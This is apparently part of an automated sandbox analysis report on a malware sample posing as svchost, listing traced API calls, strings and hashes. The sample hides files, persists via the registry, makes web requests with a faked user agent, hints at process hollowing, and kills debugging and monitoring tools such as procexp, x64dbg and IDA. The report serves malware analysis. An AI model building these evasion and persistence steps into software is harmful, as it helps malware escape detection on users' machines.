                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0

                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: GetWindowsDirectoryW.KERNEL32 ref: 00007FF67E6D3744
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: GetVolumeInformationW.KERNELBASE ref: 00007FF67E6D37C1
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3704: wsprintfW.USER32 ref: 00007FF67E6D3862
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38CD
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38E2
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38F5
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3905
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3918
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D392D
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3940
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3955
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291

                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185

                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateMutex$CloseHandleObjectReleaseSingleSleepThreadWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2668954219-0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4294037311-0

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38E2
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D38F5
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3905
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3918
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D392D
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3940
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3884: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A69), ref: 00007FF67E6D3955
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4524: CreateFileW.KERNELBASE ref: 00007FF67E6D456B
                                                                                                                                                                                                                        • CreateThread.KERNELBASE ref: 00007FF67E6D3326
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D10D8: OpenProcess.KERNEL32 ref: 00007FF67E6D10FC
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Create$File$AttributesDirectoryFolderOpenPathProcessThread
                                                                                                                                                                                                                        • String ID: .x64
                                                                                                                                                                                                                        • API String ID: 60358384-2481150777

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        control_flow_graph 436 7ff67e6d14ec-7ff67e6d1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF67E6D15F1,?,?,?,?,?,?,?,?,00007FF67E6D3418), ref: 00007FF67E6D14FF
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF67E6D15F1,?,?,?,?,?,?,?,?,00007FF67E6D3418), ref: 00007FF67E6D1514
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: fcc9240df0fb9f1d8cd1eb24de5cde03531050d7ff1e9ad230f47a91af112976
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0E00277518F85C6CA20DB15F84411AB7B4FBD9B94FA04125EACD86B28DF3CC569CB04

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        control_flow_graph 437 7ff67e6d1444-7ff67e6d1476 GetSystemInfo 438 7ff67e6d1481-7ff67e6d1488 437->438 439 7ff67e6d1478-7ff67e6d147d 437->439 441 7ff67e6d1491 438->441 442 7ff67e6d148a-7ff67e6d148f 438->442 440 7ff67e6d1493-7ff67e6d1498 439->440 441->440 442->440 442->441
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                        • Opcode ID: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction ID: 15d728e4ece59671652d2351f1f050e760d5396f0d8c0df5468deaa0c57143aa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51E065A7A2C04182FB708730E51433B62E1F764B44FF00535FA8DC26D4EE6CCA449B40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Sleep$CreateObjectSingleThreadWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2604865191-0
                                                                                                                                                                                                                        • Opcode ID: 734b4daac9faf042d12da8b8d35537129b69a461801daf7e9e59510d65147352
                                                                                                                                                                                                                        • Instruction ID: c32aa799b805eae31564c51920e9fbcf3e7577fd13e5aafe123279779a29f9e7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 734b4daac9faf042d12da8b8d35537129b69a461801daf7e9e59510d65147352
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4D0122AEBC193D1EA58F7719C4D07B21A1AB65300FF00834F149C01D0CD1C959DA620
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction ID: d095f3c1f1a73f8ffe93f43e00f821102022430ebd7877c164c91335c3b53f09
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19106ccd0018fcd50527fbd11ca19c825cdf565e5c439e3b620bbfd6b909e770
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3D0C926E3898281EA94DB27E88971A66A0FBD5B44FA08035E68981564CE3CC19D8B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction ID: f554afc5acd634f3db668d1ad3a52dd278edc5174fb00b6f6e2a06159504dd0a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0632E836618AC186EB70CB16E8547ABB3A1FBD8B45F604135EA8DC7B58DF3CD4489B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF67E6D219D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction ID: 2b32a375a4482d0675828a968cdecbe0872464312e8fe941e07237350959be8a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3344087d9ea4d8767dad2cf8c1e5dc35776cf689aa0c01a0ee6867c1dab9e5ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5771DE36528A82C2EB50CB55F85872BB761FBD4B94F705035F68A87A68CF7CD4489B40
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4404: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30A7), ref: 00007FF67E6D444C
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4404: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30A7), ref: 00007FF67E6D4489
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4404: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30A7), ref: 00007FF67E6D4494
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3B44: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30AC), ref: 00007FF67E6D3B87
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3B44: RegSetValueExW.ADVAPI32 ref: 00007FF67E6D3BBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3B44: RegCloseKey.ADVAPI32 ref: 00007FF67E6D3BCC
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3BE4: RegDeleteKeyW.ADVAPI32 ref: 00007FF67E6D3BFC
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF67E6D3DF7
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: Process32FirstW.KERNEL32 ref: 00007FF67E6D3E2A
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: CloseHandle.KERNEL32 ref: 00007FF67E6D3E3C
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: wcscmp.MSVCRT ref: 00007FF67E6D3E51
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: OpenProcess.KERNEL32 ref: 00007FF67E6D3E67
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: TerminateProcess.KERNEL32 ref: 00007FF67E6D3E8A
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: CloseHandle.KERNEL32 ref: 00007FF67E6D3E98
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: Process32NextW.KERNEL32 ref: 00007FF67E6D3EAB
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DE4: CloseHandle.KERNEL32 ref: 00007FF67E6D3EBD
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3974: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF67E6D3ACC), ref: 00007FF67E6D39A4
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF67E6D3156
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672772282.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672817346.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672861638.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672913732.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        • Opcode ID: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction ID: 1aebc30a1bc7906e8e82b93b964b6387efcd46b7d0736c3852a2be56663af940
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339fd54a0e88a8edec9c2291851a6af2bb4e1354df30f5a312e4e2acca931261
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C21792BE7C94290EE00E724DC952BBA621AF74750FF00132F46DD62E69E5DE50DA600
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000003.00000002.2672725113.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                         • Associated: 00000003.00000002.2672679776.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmp
